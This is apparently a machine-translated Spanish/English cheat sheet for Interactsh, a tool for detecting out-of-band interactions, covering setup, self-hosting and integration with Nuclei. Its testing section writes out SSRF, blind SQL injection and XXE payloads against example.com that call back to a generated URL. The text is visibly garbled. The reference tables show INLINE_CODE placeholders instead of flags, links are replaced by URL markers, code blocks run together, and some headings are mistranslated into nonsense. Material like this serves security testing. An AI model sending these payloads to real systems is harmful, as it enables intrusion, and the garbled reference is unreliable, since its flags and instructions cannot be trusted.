Interactsh
__FRONTMATTER_94_# Interactsh OOB Interaction Gathering Cheat Sheet
Overview¶
Interactsh es una herramienta de código abierto desarrollada por Project Discovery para detectar interacciones fuera de banda (OOB). Está diseñado para identificar vulnerabilidades que causan interacciones externas, como Server-Side Request Forgery (SSRF), Blind SQL Injection, XML External Entity (XXE) Injection, y otras vulnerabilidades que pueden no ser inmediatamente visibles a través de métodos de prueba tradicionales.
Lo que hace que Interactsh sea único es su enfoque integral para las pruebas de OOB. A diferencia de otras herramientas que se centran en protocolos específicos, Interactsh puede detectar interacciones entre múltiples protocolos, incluyendo DNS, HTTP(S), SMTP(S), y LDAP. Consiste en un componente servidor que captura y registra estas interacciones y un componente cliente que genera URLs y monitores de prueba únicos para cualquier interacción con esas URL.
Interactsh es ampliamente utilizado en las pruebas de seguridad para identificar vulnerabilidades que de otro modo no se detectan. Es particularmente valioso para los cazadores de recompensas, los testadores de penetración y los investigadores de seguridad que necesitan verificar la existencia de vulnerabilidades que dependen de interacciones externas. La herramienta también está integrada con Nuclei, otra herramienta Project Discovery, permitiendo un análisis de vulnerabilidad automatizado con capacidades de detección de OOB.
Instalación¶
Instalación del cliente¶
Usando Go¶
# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
# Verify installation
interactsh-client -version
Usando Docker¶
# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest
# Run Interactsh client using Docker
docker run -it projectdiscovery/interactsh:latest client -h
Usando Homebrew (macOS)¶
# Install using Homebrew
brew install interactsh-client
# Verify installation
interactsh-client -version
Usando PDTM (Project Discovery Tools Manager)¶
# Install PDTM first if not already installed
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
# Install Interactsh client using PDTM
pdtm -i interactsh-client
# Verify installation
interactsh-client -version
Instalación del servidor (Auto-Hosted)¶
Usando Go¶
# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
# Verify installation
interactsh-server -version
Usando Docker¶
# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest
# Run Interactsh server using Docker
docker run -it projectdiscovery/interactsh:latest server -h
Uso básico¶
Client Usage¶
# Start the client with default settings
interactsh-client
# Start the client with verbose output
interactsh-client -v
# Start the client with a specific server
interactsh-client -server your-interactsh-server.com
Server Usage (Auto-Hosted)¶
# Start the server with default settings
interactsh-server
# Start the server with a specific domain
interactsh-server -domain your-domain.com
# Start the server with verbose output
interactsh-server -v
Output Options¶
# Save interactions to a file
interactsh-client -o interactions.log
# Output in JSON format
interactsh-client -json -o interactions.json
# Silent mode (no banner)
interactsh-client -silent
Configuración del cliente¶
Configuración básica¶
# Set polling interval (seconds)
interactsh-client -poll-interval 5
# Set interaction timeout (seconds)
interactsh-client -interaction-timeout 60
# Enable persistent session
interactsh-client -persistent-session
# Use a specific correlation ID
interactsh-client -correlation-id your-correlation-id
Authentication¶
# Use token for authentication
interactsh-client -token your-auth-token
# Use a specific server with token
interactsh-client -server your-interactsh-server.com -token your-auth-token
Filtración¶
# Filter interactions by type
interactsh-client -filter-type dns,http
# Filter interactions by IP
interactsh-client -filter-ip 1.2.3.4
# Filter interactions by content
interactsh-client -filter-content "admin"
Configuración del servidor (Auto-Hosted)¶
Configuración de dominio¶
# Set domain for the server
interactsh-server -domain your-domain.com
# Set wildcard domain
interactsh-server -domain your-domain.com -wildcard
# Set IP address to listen on
interactsh-server -ip 1.2.3.4
Configuración de certificados¶
# Use Let's Encrypt for certificates
interactsh-server -domain your-domain.com -letsencrypt
# Use custom certificates
interactsh-server -domain your-domain.com -cert cert.pem -key key.pem
Configuración de autenticación¶
# Enable authentication
interactsh-server -auth
# Set token for authentication
interactsh-server -auth-token your-auth-token
# Set token file for authentication
interactsh-server -auth-token-file tokens.txt
Advanced Usage¶
Client Advanced Features¶
# Generate a specific number of URLs
interactsh-client -n 5
# Generate URLs with a specific payload
interactsh-client -payload-template "\\\\{\\\\{random\\\\}\\\\}.your-domain.com"
# Enable DNS callback only
interactsh-client -dns-only
# Enable HTTP callback only
interactsh-client -http-only
# Enable SMTP callback only
interactsh-client -smtp-only
Server Advanced Features¶
# Enable specific services
interactsh-server -dns -http -smtp -ldap
# Disable specific services
interactsh-server -no-dns -no-http -no-smtp -no-ldap
# Set custom ports
interactsh-server -dns-port 53 -http-port 80 -https-port 443 -smtp-port 25 -smtps-port 587 -ldap-port 389
# Enable metrics
interactsh-server -metrics
Payload Generation¶
# Generate a URL for testing
interactsh-client -generate-url
# Generate multiple URLs
interactsh-client -generate-url -n 5
# Generate URL with specific server
interactsh-client -generate-url -server your-interactsh-server.com
Integración con otras herramientas¶
Integración con Nuclei¶
# Use Interactsh with Nuclei
nuclei -u https://example.com -t nuclei-templates/
# Use a specific Interactsh server with Nuclei
nuclei -u https://example.com -t nuclei-templates/ -interactsh-server your-interactsh-server.com
# Disable Interactsh in Nuclei
nuclei -u https://example.com -t nuclei-templates/ -no-interactsh
Integración con Notificar¶
# Send Interactsh interactions to Discord
interactsh-client|notify -provider discord
# Send filtered interactions to Slack
interactsh-client -filter-type http|notify -provider slack
Integración con scripts personalizados¶
# Use Interactsh in a bash script
#!/bin/bash
URL=$(interactsh-client -generate-url)
curl -s "https://example.com/test?url=$URL"
interactsh-client -poll-interval 5 -interaction-timeout 30
Testing Vulnerabilities¶
Testing SSRF¶
# Generate a URL for SSRF testing
URL=$(interactsh-client -generate-url)
# Use the URL in a potential SSRF vulnerability
curl -s "https://example.com/fetch?url=http://$URL/test"
# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30
Testing Blind SQL Injection¶
# Generate a URL for Blind SQL Injection testing
URL=$(interactsh-client -generate-url)
# Use the URL in a SQL query
curl -s "https://example.com/search?id=1' UNION SELECT LOAD_FILE(CONCAT('\\\\',$URL,'\\share'))"
# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30
Testing XXE Injection¶
# Generate a URL for XXE testing
URL=$(interactsh-client -generate-url)
# Create an XML payload with XXE
cat > xxe.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://$URL/xxe">
]>
<foo>&xxe;</foo>
EOF
# Send the XML payload
curl -s -X POST -d @xxe.xml -H "Content-Type: application/xml" https://example.com/api
# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30
Troubleshooting¶
Common Issues¶
- No se detectaron interacciones
# Increase polling interval interactsh-client -poll-interval 10 # Increase interaction timeout interactsh-client -interaction-timeout 120 # Check if the target is behind a firewall # Try using different protocols (DNS, HTTP, SMTP) ``` 2. ** Cuestiones relativas a la Convención** ```bash # Check if the server is reachable ping your-interactsh-server.com # Try a different server interactsh-client -server oast.pro # Check if your network allows outbound connections ``` 3. ** Cuestiones relativas a la delincuencia** ```bash # Verify token interactsh-client -server your-interactsh-server.com -token your-auth-token -v # Check if the server requires authentication ``` 4. **Problemas de configuración de inversores** ```bash # Check DNS configuration dig ns your-domain.com # Verify that your domain's nameservers point to your server # Ensure that your server has the necessary ports open ``` ### Debugging ```bash # Enable verbose mode for client interactsh-client -v # Enable debug mode for client interactsh-client -debug # Enable verbose mode for server interactsh-server -v # Enable debug mode for server interactsh-server -debug
Self-Hosting Guide¶
DNS Configuration¶
Para autohost Interactsh, necesita configurar la configuración DNS de su dominio:
- Registrar un dominio (por ejemplo,
your-domain.com_) - Configurar registros NS para que tu dominio señale a tu servidor: ns1.your-domain.com. IN A your-server-ip ns2.your-domain.com. IN A your-server-ip ```
Server Setup¶
# Start the server with your domain
interactsh-server -domain your-domain.com
# Enable Let's Encrypt for HTTPS
interactsh-server -domain your-domain.com -letsencrypt
# Enable authentication
interactsh-server -domain your-domain.com -auth -auth-token your-auth-token
Docker Deployment¶
# Create a docker-compose.yml file
cat > docker-compose.yml << EOF
version: '3'
services:
interactsh-server:
image: projectdiscovery/interactsh:latest
command: server -domain your-domain.com -letsencrypt -auth -auth-token your-auth-token
ports:
- "53:53/udp"
- "80:80"
- "443:443"
- "25:25"
- "587:587"
- "389:389"
restart: always
EOF
# Start the server
docker-compose up -d
Configuración¶
Archivo de configuración del cliente¶
Interactsh client utiliza un archivo de configuración ubicado en $HOME/.config/interactsh-client/config.yaml. Puede personalizar varios ajustes en este archivo:
# Example configuration file
server: oast.pro
token: your-auth-token
poll-interval: 5
interaction-timeout: 60
filter-type: dns,http
Archivo de configuración del servidor¶
Interactsh server utiliza un archivo de configuración ubicado en $HOME/.config/interactsh-server/config.yaml_. Puede personalizar varios ajustes en este archivo:
# Example configuration file
domain: your-domain.com
ip: 1.2.3.4
letsencrypt: true
auth: true
auth-token: your-auth-token
Environment Variables¶
# Set Interactsh client configuration via environment variables
export INTERACTSH_SERVER=oast.pro
export INTERACTSH_TOKEN=your-auth-token
export INTERACTSH_POLL_INTERVAL=5
export INTERACTSH_INTERACTION_TIMEOUT=60
# Set Interactsh server configuration via environment variables
export INTERACTSH_DOMAIN=your-domain.com
export INTERACTSH_IP=1.2.3.4
export INTERACTSH_LETSENCRYPT=true
export INTERACTSH_AUTH=true
export INTERACTSH_AUTH_TOKEN=your-auth-token
Reference¶
Opciones de la línea de comandos del cliente¶
| Flag | Description |
|---|---|
| INLINE_CODE_39 | Interactsh server to use |
| INLINE_CODE_40 | Authentication token for the server |
| INLINE_CODE_41 | Number of URLs to generate |
| INLINE_CODE_42 | File to write output to |
| INLINE_CODE_43 | Write output in JSON format |
| INLINE_CODE_44 | Show verbose output |
| INLINE_CODE_45 | Show debug information |
| INLINE_CODE_46 | Polling interval in seconds |
| INLINE_CODE_47 | Interaction timeout in seconds |
| INLINE_CODE_48 | Enable persistent session |
| INLINE_CODE_49 | Correlation ID for the session |
| INLINE_CODE_50 | Filter interactions by type (dns, http, smtp, ldap) |
| INLINE_CODE_51 | Filter interactions by IP |
| INLINE_CODE_52 | Filter interactions by content |
| INLINE_CODE_53 | Generate URL for testing |
| INLINE_CODE_54 | Enable DNS callback only |
| INLINE_CODE_55 | Enable HTTP callback only |
| INLINE_CODE_56 | Enable SMTP callback only |
| INLINE_CODE_57 | Enable LDAP callback only |
| INLINE_CODE_58 | Custom payload template |
| INLINE_CODE_59 | Show Interactsh client version |
Server Command Line Options¶
| Flag | Description |
|---|---|
| INLINE_CODE_60 | Domain to use for the server |
| INLINE_CODE_61 | IP address to listen on |
| INLINE_CODE_62 | Enable wildcard domain |
| INLINE_CODE_63 | Use Let's Encrypt for certificates |
| INLINE_CODE_64 | Path to certificate file |
| INLINE_CODE_65 | Path to key file |
| INLINE_CODE_66 | Enable authentication |
| INLINE_CODE_67 | Authentication token |
| INLINE_CODE_68 | File containing authentication tokens |
| INLINE_CODE_69 | Enable DNS service |
| INLINE_CODE_70 | Enable HTTP service |
| INLINE_CODE_71 | Enable SMTP service |
| INLINE_CODE_72 | Enable LDAP service |
| INLINE_CODE_73 | Disable DNS service |
| INLINE_CODE_74 | Disable HTTP service |
| INLINE_CODE_75 | Disable SMTP service |
| INLINE_CODE_76 | Disable LDAP service |
| INLINE_CODE_77 | Port for DNS service |
| INLINE_CODE_78 | Port for HTTP service |
| INLINE_CODE_79 | Port for HTTPS service |
| INLINE_CODE_80 | Port for SMTP service |
| INLINE_CODE_81 | Port for SMTPS service |
| INLINE_CODE_82 | Port for LDAP service |
| INLINE_CODE_83 | Enable metrics |
| INLINE_CODE_84 | Show verbose output |
| INLINE_CODE_85 | Show debug information |
| INLINE_CODE_86 | Show Interactsh server version |
Tipos de interacción compatibles¶
| Type | Description |
|---|---|
| INLINE_CODE_87 | DNS interactions |
| INLINE_CODE_88 | HTTP/HTTPS interactions |
| INLINE_CODE_89 | SMTP/SMTPS interactions |
| INLINE_CODE_90 | LDAP interactions |
Resources¶
- [Documentación Oficial](URL_91__
- [Repositorio GitHub](URL_92__
- [Discord de descubrimiento del producto](URL_93_
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de Interactsh, desde el uso básico del cliente y del servidor hasta la configuración avanzada e integración con otras herramientas. Para la información más actualizada, consulte siempre la documentación oficial. *